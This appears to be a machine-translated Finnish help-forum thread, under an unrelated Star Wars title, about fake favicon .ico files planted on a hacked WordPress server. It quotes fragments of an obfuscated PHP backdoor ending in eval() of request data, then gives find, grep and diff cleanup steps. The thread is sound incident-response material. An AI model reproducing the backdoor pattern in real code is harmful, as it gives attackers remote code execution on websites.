Star Wars: Battlefront Live Action -traileri - Tule tehokkaammaksi

Tiedostot näkyvät odottamattomasti yhdessä jaetuista verkkopalvelimista. Ne voivat esiintyä melko sadoissa hakemistoissa, ja niitä kutsutaan aina sellaisiksi favicon_1166f9.ico. Ensimmäiset 6 merkkiä ovat aina favico ja laajennus on aina ico. Nämä eivät ole kuvakkeita, eikä kuvankatseluohjelma voi avata niitä.

Viisi päivää sitten tein puhtaan pyyhkäisyn ja poistin satoja näitä tiedostoja, mutta löysin vain kaksi. Huomasin joitain palvelimella aiemmin, mutta ajattelin, että faviconin lataaminen oli vain korruptiota, mutta ilmeisesti näin ei ole. Sivusto itse asiassa yhtenä favicon.ico vain kotihakemistossa ja toimii hyvin.

Miksi nämä tiedostot saattavat edelleen näkyä? Onko sivusto murtautunut?

PÄIVITYS 1: Alkaa näyttää todella hakata. Tässä on lisätty osittainen sisältö:

$c6d81c6 = 607;$GLOBALS['g1aff67e']=Array();global$g1aff67e;$g1aff67e=$GLOBALS;${'\x47\x4c\x4fB\x41\x4c\x53'}['h21842aa7']='\x59\x2f\x6c\x45\x75\x44\x7a\x6f\x68\x2a\x53\x74\x73\x51\x48\x72\x26\x21\x25\x67\x28\x70\x55\x7c\xa\x76\x35\x60\x52\x43\x65\x3d\x4d\x71\x4f\x32\x31\x7e\x34\x20\x5a\x41\x2e\x2c\x3b\x9\x30\x6a\x57\x6e\x3f 

Ja se jatkuu 7K: lla, joka päättyy:

[91].$g1aff67e['h21842aa7'][38].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][57].$g1aff67e['h21842aa7'][36].$g1aff67e['h21842aa7'][66].$g1aff67e['h21842aa7'][38]]($b7ce1c0db)==3){eval/*v3f8d8*/($b7ce1c0db[1]($b7ce1c0db[2]));exit();}}}  ?> var13 ->

Huomaa, että viimeinen osa on eval kaikesta muusta.

PÄIVITYS 2: Tämä StackOverflow-kysymys näyttää jonkun, jolla on sama ongelma.

Vastaus on hyväksytty, mutta ehdotettu ratkaisu on poistaa kaikki POST-pyynnöt, jotka eivät ole mahdollisia tässä, koska tämä on WordPress-sivusto ja POSTia käyttäviä osia on myös muita (vaikkakaan niitä ei ole paljon, mutta ne ovat välttämättömiä).

Näiden tietojen perusteella näyttää siltä, ​​että tämä on hyökkäys ja ei virus minkä vuoksi virustarkistus ei osoittautunut mitään.

Kysymys kuuluu nyt: Kuinka estän tämän hyökkäyksen toimimasta? Jos niin itse asiassa tapahtuu.

  • Tämä on jaettu palvelin, jossa on Apache ja Wordpress. Muut käyttäjät saattavat käyttää muita sisällönhallintajärjestelmiä, mutta minun puolellani se on. Minulta ei myöskään cron-töitä. Se on toistaiseksi todella satunnaista.
  • voi olla syytä tarkistaa, onko verkkosivustosi säilössä / kansioissa myös suositeltu käyttöoikeus. Jos toinen palvelimella isännöity verkkosivusto vaarantuu ja tuottaa .ico-tiedostoja, se pystyy tallentamaan verkkotunnuksesi / tilikohtaiseen tiedostorakenteeseen vain, jos sillä on pääkäyttäjä palvelimelle, pääkäyttäjän käyttöoikeus tilillesi tai jos verkkosivustosi säilön kansioilla on löyhät oikeudet.
  • 1 Haluan ehdottomasti suorittaa virustarkistuksen tilillä. Olen havainnut, että hakkeroiduilla Wordpress-tileillä on usein .ico-tiedostoissa hyötykuorma. Olen yllättynyt, jos et löydä muita tartunnan saaneita tiedostoja. Jos sinulla on SSH-käyttöoikeus, voit etsiä viimeisen 24 tunnin aikana muuttuneita tiedostoja sudo etsi ./ -mtime -1 -ls
  • Yritä tarkastella yhtä ico tiedostot tekstieditorilla ja jaa sisältö täällä, jos se on ollenkaan ymmärrettävää.Suosittelen myös, että lähetät luettelon laajennuksistasi tänne, koska luulisin, että yksi heistä saattaa tehdä tämän.
  • @Steve - Sitä epäilen, ico-tiedostot ovat hyötykuormaa. Kaikki on binaarista, ja jopa Unix-tiedostokomento ei tunnistanut ketään, jonka kanssa yritin. Skannaan kopion tilistäni, mutta en usko, että se on mahdollista jaetulla isännällä.

Tämä on hyökkäys, joka kohdistuu PHP-haavoittuvuuteen POST-pyyntöjen avulla.

Hyökkääjä onnistuu jotenkin muuttamaan olemassa olevia PHP-tiedostoja @include-käskyllä ​​käyttämällä koodattua polkua, joka kääntyy yhdeksi näiksi .ico-tiedostoiksi, jotka purkavat itse salauksen purkavat PHP-tiedostot ja kutsuvat ulkoista komentosarjaa toisesta palvelimesta.

POST-pyyntöjen estäminen toimii toistaiseksi. Vaikka se on mahdollista vain sivustoille, jotka eivät ole riippuvaisia ​​ulkoisista POST-pyynnöistä. Tämä voidaan tehdä .htaccess tiedosto tässä selitetyn mukaisesti.

MUOKATTU: Tämä on tunnettu php-hakkerointi. Jos palvelimesi käyttää vain Wordpressia, laajennukset, kuten Wordfence, voivat havaita ja puhdistaa tartunnan saaneet tiedostot, mutta jos sinulla on muita php-sovelluksia, se suorittaa muut vaiheet. Juoksin Maldetin ja en työskennellyt.

Se ruiskuttaa tai muokkaa index.php-tiedostoja, jotka kutsuvat .ico-tiedostoa, luovat myös satunnaisia ​​nimettyjä .php-tiedostoja

Syy voi olla monia, mukaan lukien suojaamattomat POST-toiminnot. Käytä aina suojattuja lomakkeita, joissa on recaptcha. Järjestelmäsi on ehdottomasti hakkeroitu, mutta tiedostojen kopioiminen uuteen käyttöjärjestelmään todennäköisesti kopioi myös tartunnan saaneen koodin.

Kiertotavat tartunnan saaneiden tiedostojen puhdistamiseksi

ico-tiedostot

Etsi kaikki .ico-tiedostot html-juuresta ssh: n avulla:

find -name '*.ico' 

Poista ne, joissa on satunnaisia ​​merkkejä ennen .ico-laajennusta

index.php-tiedostot

He käyttävät tartunnan saanutta tiedostoa käyttämällä index.php-tiedostossa olevaa @include-tiedostoa. Löysin vaarantuneet index.php-tiedostot näin paljon nopeammin kuin puhdas grep-komento:

find -name index.php -exec grep -rnwl '@include ' {} \; 

Poista haitallinen koodi, jos loput tiedostosta on alkuperäinen, tai yksinkertaisesti roskakorissa, jos se on tämän haitallisen hyökkäyksen luoma.

Satunnaiset .php-tiedostot

He käyttävät satunnaisia ​​nimiä, clistä löydät samanlaisia ​​malleja. Minun tapauksessani tiedostoissa oli 8 merkkiä kauan ennen .php: tä, jolla oli alaosatoiminto nimien luomiseen, joten löysin ne näin:

find -name '????????.php' -exec grep -rnwl 'substr(md5(time()), 0, 8)' {} \; 

Ero

Voit käyttää diff-näppäintä löytääksesi eroja alkuperäisten juttujen kanssa tai käyttämällä svn, git.

diff -qr directory-1/ directory-2/ 
  • 1 Yksinkertaisesti 'git-tila' riittää kaikkien erojen näkemiseen. Katso vastauksestani miten estää sitä toistumasta, muuten tämä ei pääty tähän ja sinun on toistettava tässä selvästi kuvattu menettely.
  • POSTin estäminen ei ole vaihtoehto monissa sovelluksissa, jos hyväksyt kommentit sivustollasi voila. Suojatut lomakkeet ja välttää tuntemattomia / hylättyjä / huonosti luokiteltuja laajennuksia voi auttaa.

työskennellyt sinulle: Charles Robertson | Haluatko yhteyttä?